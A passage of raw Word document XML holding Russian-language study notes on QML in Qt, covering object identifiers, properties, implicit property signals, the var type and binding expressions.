    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00064AC7">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>присоединённые обработчики сигналов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2FCD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждый </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет ровно один </w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>идентификатор</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> атрибут. Он обеспечивается самим языком. </w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Идентификатор</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> присваивается </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">у, чтобы он мог быть распознан другими </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ами. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Есть правила </w:t>
      </w:r>
      <w:r w:rsidR="00F850EA" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>написа</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ния идентификаторов. Есть интересный пример кода установки идентификатора. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Свойство</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – это атрибут </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">а, которому </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>может быть присвоено статическое значение или связано с динамическим выражением</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Свойства обычно открыты, но их можно делать и закрытыми. Свойства могут определятся для типов </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>С++,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в которых определено </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PROPERTY</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Также есть пример обычного синтаксиса объявления свойства. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Свойства </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5106">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>должны начинаться со строчных букв и содержать только буквы, числа и нижние подчеркивания</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Это связано с тем, что в данном языке автоматически создаются обработчики сигналов для обработки таких с</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>во</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>йств.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="00B050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Объявление частного свойства </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>неявно создаёт также сигнал</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для данного свойства </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>и связанный с ним обработчик сигнала</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Есть примеры их названий. Есть примеры кода.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Все базовые типы </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> кроме перечисления могут быть использованы как типы частных свойств. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Есть пример кода. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Базовый тип </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – это тип, который может содержать любое значение, включая списки и </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ы.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее показано </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>присваивание значения свойства при инициализации</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее показано </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>императивное присваивание значения свойства</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее есть таблица описания, что является </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>статическим значением</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, а что является </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>связывающим выражением</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Есть примеры задания свойств как первого, так и второго типа.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB2FCD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidR="00CB2FCD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CB2FCD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>binding</w:t>
      </w:r>
      <w:r w:rsidR="00CB2FCD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00CB2FCD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2FCD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Свойства являются </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>безопасными по типу</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: свойству может быть присвоено только такое значение, кото</w:t>
      </w:r>
      <w:r w:rsidR="00CB2FCD" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>рое совпадает с типом свойства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2FCD" w:rsidRPr="00D815C8" w:rsidRDefault="00CB2FCD" w:rsidP="00CF5106">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc483603877"/>
      <w:bookmarkStart w:id="22" w:name="_Toc483605097"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Специальные свойства</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00CB2FCD" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее показано, как создавать </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>списки свойств.</w:t>
      </w:r>
      <w:r w:rsidR="008A25E2" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB2FCD" w:rsidRPr="00D815C8" w:rsidRDefault="00CB2FCD" w:rsidP="00CB2FC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eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
